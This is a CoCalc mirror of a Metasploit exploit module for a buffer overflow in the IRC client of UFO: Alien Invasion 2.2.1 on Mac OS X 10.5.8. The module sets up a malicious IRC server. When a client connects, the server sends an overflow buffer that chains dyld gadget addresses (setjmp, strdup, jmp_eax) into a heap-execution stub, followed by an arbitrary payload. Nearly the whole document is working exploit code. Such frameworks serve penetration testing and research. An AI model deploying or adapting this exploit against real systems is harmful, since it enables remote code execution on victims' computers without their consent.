Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/osx/misc/ufo_ai.rb
24578 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::TcpServer

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'UFO: Alien Invasion IRC Client Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a buffer overflow in the IRC client component

18
          of UFO: Alien Invasion 2.2.1.

19
        },

20
        'Author' => [

21
          'Jason Geffner', # Original Windows PoC Author

22
          'dookie' # OSX Exploit Author

23
        ],

24
        'License' => MSF_LICENSE,

25
        'References' => [

26
          [ 'CVE', '2009-10006' ],

27
          [ 'OSVDB', '65689' ],

28
          [ 'EDB', '14013' ]

29
        ],

30
        'Payload' => {

31
          'Space' => 400,

32
          'BadChars' => "\x00\x0a\x0d",

33
          'MaxNops' => 0,

34
          'StackAdjustment' => -3500,

35
        },

36
        'Platform' => 'osx',

37
        'Targets' => [

38
          [

39
            'Mac OS X 10.5.8 x86, UFOAI 2.2.1',

40
            {

41
              'Arch' => ARCH_X86,

42
              'Offset' => 524,

43
              'Writable' => 0x8fe66448, # dyld __IMPORT

44
              # The rest of these addresses are in dyld __TEXT

45
              'setjmp' => 0x8fe1cf38,

46
              'strdup' => 0x8fe210dc,

47
              'jmp_eax' => 0x8fe01041

48
            }

49
          ]

50
        ],

51
        'DefaultTarget' => 0,

52
        'DisclosureDate' => '2009-10-28',

53
        'Notes' => {

54
          'Reliability' => UNKNOWN_RELIABILITY,

55
          'Stability' => UNKNOWN_STABILITY,

56
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

57
        }

58
      )

59
    )

60


61
    register_options(

62
      [

63
        OptPort.new('SRVPORT', [ true, "The IRC daemon port to listen on", 6667 ]),

64
      ]

65
    )

66
  end

67


68
  def make_exec_payload_from_heap_stub()

69
    frag0 =

70
      "\x90" + # nop

71
      "\x58" + # pop eax

72
      "\x61" + # popa

73
      "\xc3"   # ret

74


75
    frag1 =

76
      "\x90" +             # nop

77
      "\x58" +             # pop eax

78
      "\x89\xe0" +         # mov eax, esp

79
      "\x83\xc0\x0c" +     # add eax, byte +0xc

80
      "\x89\x44\x24\x08" + # mov [esp+0x8], eax

81
      "\xc3"               # ret

82


83
    setjmp = target['setjmp']

84
    writable = target['Writable']

85
    strdup = target['strdup']

86
    jmp_eax = target['jmp_eax']

87


88
    exec_payload_from_heap_stub =

89
      frag0 +

90
      [setjmp].pack('V') +

91
      [writable + 32, writable].pack("V2") +

92
      frag1 +

93
      "X" * 20 +

94
      [setjmp].pack('V') +

95
      [writable + 24, writable, strdup, jmp_eax].pack("V4") +

96
      "X" * 4

97
  end

98


99
  def on_client_connect(client)

100
    print_status("Got client connection...")

101


102
    offset = target['Offset']

103


104
    buffer = "001 :"

105
    buffer << rand_text_alpha_upper(offset)

106
    buffer << make_exec_payload_from_heap_stub()

107
    buffer << make_nops(16)

108
    buffer << payload.encoded

109
    buffer << "\x0d\x0a"

110


111
    print_status("Sending exploit to #{client.peerhost}:#{client.peerport}...")

112
    client.put(buffer)

113
  end

114
end

115


116